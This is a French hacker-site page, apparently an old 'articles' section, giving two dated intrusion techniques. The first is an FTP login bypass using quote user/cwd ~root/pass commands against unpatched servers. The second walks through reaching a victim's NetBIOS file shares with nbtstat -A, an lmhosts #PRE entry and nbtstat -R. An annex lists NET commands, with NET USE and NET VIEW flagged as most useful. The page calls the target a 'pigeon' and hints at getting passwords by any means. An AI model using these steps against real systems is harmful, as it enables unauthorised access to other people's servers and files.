A r t i c l e S
+ 1 + r 3  d U  5 1 + 3

**- M e n u -**

-news
-articles
-downloads
-liens
-atelier
-forum
-LivreDor

 

*** Vieille Technique FTP ***


Cette technique marche de moins en moins, mais persiste sur de vieux serveur ftp (mettez a jour vos serveur merde, c pas compliqué !).
L'exemple ici sera fait a partir d'un client ftp du type ms ou linux de base.
On lance le client avec l'option -n (pour ne pas se conecter automatiquement), ce qui permet de tapper des commandes sont etre loggé. En principe seul certaine commandes sont alloué, comme USER pour se loggé justement, mais il s'avère que des failles nous aide...:-)
Alors, on lance son client du genre : ftp -n www.bidon.com et la si c bon, on enchaine :
  • quote user ftp
  • quote cwd ~root
  • quote pass ftp

Et voila on est loggé (pas souvent, et en root encore moins ;-))



*** Vieille Technique NetBios ***


Cette vieille technique permet d'avoir la cible dans son voisinage réseaux :-)
Ce ki faut, c'est un bon pigeon,enfin son adresse ip,(excusé le terme mais franchement s'en est un) ki n'a pas de firewall, le service de partage de fichiers et d'imprimantes d'installé (pour windoze et samba pour linux/unix), le port 139 d'ouvert et un partage d'actif (peyt-être plus de condition plus précises mais je n'ai pas eut le temps d'effectuer tous les tests.
Voici le procédé :
  • Trouver une ip potentiel
  • Trouver le nom de machine réseaux NetBios
  • Rajouter une ligne dans son fichier host local
  • Mettre a jour le service NetBios
Apres ca, normalement, vous voyez un nouveau poste dans votre voisinage reseau

Bon maintenant, voyons ca en détails :
  • Trouver une ip potentiel, ca, je vous fais confiance ;-)
  • Trouver le nom de machine réseaux NetBios
    Pour ce faire nous utiliserons l'utilitaire MS NBTSTAT.
    Sur une ligne de commande dos taper :
    nbtstat -A ip-cible
    Ex.:
    nbtstat -A 192.168.1.7



           NetBIOS Remote Machine Name Table
    
       Name               Type         Status
    ---------------------------------------------
    nom de la machine <00>  UNIQUE      Registered
    nom du groupe     <00>  GROUP       Registered
    nom du user       <03>  UNIQUE      Registered
    nom de la machine <20>  UNIQUE      Registered
    nom du groupe     <1E>  GROUP       Registered
    
    MAC Address = 00-40-XX-XX-XX-XX

    De mémoire, le <03> correspond au user de connecté sur la machine,
    le <20> et <1E> signifie que c bon, y'a bien des partages d'actif sur cette machine
    (sinon ca veux juste dire que le netbios est bien la mais kil n'y a pas de partage)
  • Rajouter une ligne dans son fichier host local
    La c'est très simple, un notepad sur le fichier c:\windows\lmhost et la on lui rajoute en fin de fichier, une ligne du type :
    ip-cible nom de la machine #PRE (ne pas oublier le "#PRE" sinon ca marche pas :-))

  • Mettre a jour le service NetBios
    On retourne sur la ligne de commande Dos et on utilise toujours l'utilitaire nbtstat pour mettre a jour nos modif (ce qui donne normalement exécuté) :
    nbtstat -R

    Successful purge and preload of the NBT Remote Cache Name Table.


    Et voila le travail, un nouvelle icone dans votre voisinage réseau.
    Bien sur, s'il y a un mot de pass, bah la, fo le mot de pass (d'une manière ou d'une autre ;-))


    *** A N N E X E ***

    MS NBTSTAT:
    Displays protocol statistics and current TCP/IP connections using NBT(NetBIOS ov er TCP/IP). NBTSTAT [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-s] [S] [interval] ] -a (adapter status) Lists the remote machine's name table given its name -A (Adapter status) Lists the remote machine's name table given its IP address. -c (cache) Lists the remote name cache including the IP addresses -n (names) Lists local NetBIOS names. -r (resolved) Lists names resolved by broadcast and via WINS -R (Reload) Purges and reloads the remote cache name table -S (Sessions) Lists sessions table with the destination IP addresses -s (sessions) Lists sessions table converting destination IP addresses to host names via the hosts file. RemoteName Remote host machine name. IP address Dotted decimal representation of the IP address. interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics.

    NET:
    Pour plus d'informations concernant une commande Microsoft NET particuliŠre, entrez le nom de la commande suivi de /? (par exemple, NET VIEW /?). NET CONFIG Affiche les paramŠtres actuels de votre groupe de travail. NET DIAG Ex‚cute le programme de diagnostics r‚seau de Microsoft, qui permet d'afficher des informations de diagnostics concernant votre r‚seau. NET HELP Fournit des informations concernant les commandes et les messages d'erreur. NET INIT Charge les pilotes des protocoles et des cartes r‚seau sans les lier au gestionnaire des protocoles. NET LOGOFF Interrompt la connexion entre votre ordinateur et les ressources partag‚es auxquelles celui-ci est connect‚. NET LOGON Permet de vous identifier en tant que membre d'un groupe de travail. NET PASSWORD Modifie votre mot de passe d'ouverture de session. NET PRINT Affiche des informations concernant les files d'attente d'impression et gŠre les tƒches d'impression. NET START D‚marre les services. NET STOP Arrˆte les services. NET TIME Affiche l'heure ou synchronise l'horloge de votre ordinateur par rapport … celle d'un serveur de temps Microsoft Windows pour Workgroups, Windows NT, Windows 95, ou NetWare. --> NET USE Permet de se connecter … une ressource partag‚e, de se d‚connecter de celle-ci, ou d'afficher des informations concernant les connexions. NET VER Affiche le type et le num‚ro de version du redirecteur du groupe de travail que vous utilisez. --> NET VIEW Affiche la liste des ordinateurs qui partagent des ressources ou la liste des ressources partag‚es sur un ordinateur sp‚cifique.
    (--> les plus utils dans notre cas présents)